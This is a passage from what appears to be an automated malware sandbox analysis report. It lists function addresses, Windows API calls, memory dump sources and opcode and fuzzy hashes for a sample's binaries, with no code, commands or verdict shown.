                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                              • Instruction Fuzzy Hash: 77313921E0814781FE24AB65BC273B91691AF45784F4450B5EA0EEF2E7DF6CAB05C213
                                                              Function 00007FFE013BDF10 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • 00007FFE133319A0.VCRUNTIME140(?,?,?,?,00007FFE01308ABD,?,?,?,?,00007FFE01335AA7,?,?,?,?,?,00007FFE01301E7B), ref: 00007FFE013BE0A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                              • Associated: 00000001.00000002.1989280421.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE01473000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989793982.00007FFE01475000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989865904.00007FFE01477000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007E133319
                                                              • String ID: gfff
                                                              • API String ID: 3961744453-1553575800
                                                              • Opcode ID: 923123bc1d088c60699fdb62a6b68b137d4200e3cc989c42516348cd1c48082a
                                                              • Instruction ID: 14baf2675c26fc54f4b0b94edf2169dcad626b0ab33fa9e4a35458a2800a8dc4
                                                              • Opcode Fuzzy Hash: 923123bc1d088c60699fdb62a6b68b137d4200e3cc989c42516348cd1c48082a
                                                              • Instruction Fuzzy Hash: EFF10830E0DB078AFB649F55E8946B473A0AF44B84F090539EA0E5E7B2EF7CB5458702
                                                              Function 00007FFDFAEE146A Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 251COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: ..\s\ssl\statem\statem.c
                                                              • API String ID: 1452528299-2512360314
                                                              • Opcode ID: 7d5c6cafbdf9eba0533a02d895b16706df5be332ea577afecea6ad0cef54847e
                                                              • Instruction ID: da6a90185a09211345d201be8f4a781a93f3dc3ccaa8e9be1bc54e23951c2a94
                                                              • Opcode Fuzzy Hash: 7d5c6cafbdf9eba0533a02d895b16706df5be332ea577afecea6ad0cef54847e
                                                              • Instruction Fuzzy Hash: AFB16332B0924686E7A89F15C460BB837E0EF40B68F544675EE694E6DDCF3DE885C701
                                                              Function 00007FFDFAEE1497 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                              • API String ID: 1452528299-2209325370
                                                              • Opcode ID: 3dcb4004876841d817ef47d2efc369b4e2620c560bc807afff1c78d3bfb42160
                                                              • Instruction ID: 0e0634e20c17a0c178d7c8d7a594e0b5a49145c8c293bb84755966abbc8e1cce
                                                              • Opcode Fuzzy Hash: 3dcb4004876841d817ef47d2efc369b4e2620c560bc807afff1c78d3bfb42160
                                                              • Instruction Fuzzy Hash: 6C818132B0868185EB58AF25D5E4BB96390FB44B98F194275DD6E0BBCCDF3AD846C340
                                                              Function 00007FF623F8013C Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                              • Instruction ID: e57a770f3994da9b119c3882984fd6e54b893dd56ded3e30b899fd319a64b737
                                                              • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                              • Instruction Fuzzy Hash: BF51E321B0964296EF2C9E27AC0267A6291BF44BF4F584774DD6DA3BD5CF3CE6008602
                                                              Function 00007FFDFAEE1253 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                              • API String ID: 1452528299-2209325370
                                                              • Opcode ID: 8d41160d5e821a9b59c27cfcbeb813b5333318ab4bb8ac73822785134f644a65
                                                              • Instruction ID: 44de6579a33d4759e9f6be789f9c63fb154a4f5fd9fa875197699da6881b18d9
                                                              • Opcode Fuzzy Hash: 8d41160d5e821a9b59c27cfcbeb813b5333318ab4bb8ac73822785134f644a65
                                                              • Instruction Fuzzy Hash: C541CF32B09A8182EB289F19D4D46A973A4FB44B98F154271DF6D47BD8DF3EE8918700
                                                              Function 00007FF623F8AB58 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindCloseChangeNotification.KERNEL32(?,?,?,00007FF623F8A9D5,?,?,00000000,00007FF623F8AA8A), ref: 00007FF623F8ABC6
                                                              • GetLastError.KERNEL32(?,?,?,00007FF623F8A9D5,?,?,00000000,00007FF623F8AA8A), ref: 00007FF623F8ABD0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                              • String ID:
                                                              • API String ID: 1687624791-0
                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                              • Instruction ID: c6ceb564318bcc735b17da4dfd8cbefd82b2f5b56ec9ad245d1f2fa7ea2a39fb
                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                              • Instruction Fuzzy Hash: D321C611B2C78241FE989756BC9237D2692DF847D0F0842B9DA2EE77D1DF6CEA418302
                                                              Function 00007FF623F8C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                              • Instruction ID: 9336dbdd9d0fdf810defdc196a6a3a072cbdbd72adc241d6e86b0827c276ffb5
                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                              • Instruction Fuzzy Hash: FE110162718A8181DE248B26BC45169B361AB85FF4F544371EEBD9BBE9CF3CD2108701
                                                              Function 00007FF623F8A948 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A95E
                                                              • GetLastError.KERNEL32(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A968
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: BoundaryDeleteDescriptorErrorLast
                                                              • String ID:
                                                              • API String ID: 2050971199-0
                                                              • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                              • Instruction ID: ec49e2c184fe616dc7b4a66a3d9072cf3b2e49ec6cd9db626fab6846fe3f4cdd
                                                              • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                              • Instruction Fuzzy Hash: 3BE04F50F0D20282FE095FB27C4713812519F88B80F4540B4C80DE72A1EF2CAA468212
                                                              Function 00007FF623F8BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                              • Instruction ID: 68803085ac890ff1ae1599b63a91c06515a893b200519ea23def9936efbdab5c
                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                              • Instruction Fuzzy Hash: 8A41B63291864587EE388B5AB94227973A0EF557C1F140171D78EE36D1CF2CEA02CB52
                                                              Function 00007FFDFAF26905 Relevance: 1.6, APIs: 1, Instructions: 353COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: 8461a2502f026d7e122df3db3e91d2553ea804ff5e6dd715b8e622b6a9c6ea1c
                                                              • Instruction ID: 01b53c55bc026c49075a3887a2b8fc0c613fbf863a1d12a5f1b9005e74135e70
                                                              • Opcode Fuzzy Hash: 8461a2502f026d7e122df3db3e91d2553ea804ff5e6dd715b8e622b6a9c6ea1c
                                                              • Instruction Fuzzy Hash: 3D31B272B0824686F7AC9F159560A7973E1EF50F64F5485B0FE294B7CDDE38E8928B00
                                                              Function 00007FF623F77F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _fread_nolock
                                                              • String ID:
                                                              • API String ID: 840049012-0
                                                              • Opcode ID: f8138af60deb86c1c773e1fcd8dd0bbcad097f1291feab5e202566430a029af4
                                                              • Instruction ID: fbe69b0e062130f4961cada25ae448c172bf8229cc7419cf9d91b2fb844d4202
                                                              • Opcode Fuzzy Hash: f8138af60deb86c1c773e1fcd8dd0bbcad097f1291feab5e202566430a029af4
                                                              • Instruction Fuzzy Hash: 3021D121B1879246FE549A237D077BAA641BF45BC4F8844B0EE0CAB786CF7DE241C302
                                                              Function 00007FF623F8B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                              • Instruction ID: 0200720428f4b4fd9e1d9f19a4708f9976ca0c9f1547110408a827022e38502b
                                                              • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                              • Instruction Fuzzy Hash: DF316122A1860285FF195B56AC4337C3A90BF84BD4F4101B5E91DA73D2CF7CEA428713
                                                              Function 00007FF623F85F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                              • Instruction ID: 61ac1de8077983e015140460caef87875f1144e74fe876ae013232ac7d25d2b9
                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                              • Instruction Fuzzy Hash: 9B116331A1C64182EE689F13BC0217DA2A5BF85BC4F4444B5EA4CF7A96CF7DD6008712
                                                              Function 00007FF623F96354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                              • Instruction ID: 0de4d686b8b05f6902c4c79f7e7950277f200226a631ffc6edfe3162d6415951
                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                              • Instruction Fuzzy Hash: 6021A432A18A8186EF658F18F84277976A0FB84BA4F148234E75DD76D9DF3CD5118B01
                                                              Function 00007FF623F803BC Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                              • Instruction ID: c41b35ddc64a37062a0ca2391bd1dad25dd580e235993623bcd9bbfd3780511c
                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                              • Instruction Fuzzy Hash: A301A521A4874681EE08DF536D02469A691BF85FE0F884671DE5CA3BD6CF3CD6018301
                                                              Function 00007FF623F8D5FC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF623F80C90,?,?,?,00007FF623F822FA,?,?,?,?,?,00007FF623F83AE9), ref: 00007FF623F8D63A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                              • Instruction ID: 19bc0575146a68258317672d3fa5c98ec9f8c30d231726e673ffa54f5fe70bf2
                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                              • Instruction Fuzzy Hash: D8F0DA52B0924B85FE596E627C4367512955F887F0F4847B2ED2EE72C1DF2CA6808512
                                                              Function 00007FF623F78E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF623F79390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF623F745F4,00000000,00007FF623F71985), ref: 00007FF623F793C9
                                                              • LoadLibraryW.KERNEL32(?,00007FF623F76476,?,00007FF623F7336E), ref: 00007FF623F78EA2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                              • String ID:
                                                              • API String ID: 2592636585-0
                                                              • Opcode ID: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
                                                              • Instruction ID: c39afbd0edaada95a77e08614587c30c50a68b52adf03392f9bf33f46bfe81fb
                                                              • Opcode Fuzzy Hash: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
                                                              • Instruction Fuzzy Hash: 8BD0C211F3824542EE88AB67BE4763A5261AF8DFC0F88C075EE0D4BB5AED3CC1514B00
                                                              Function 00007FFDFAEE1CF8 Relevance: 1.3, APIs: 1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
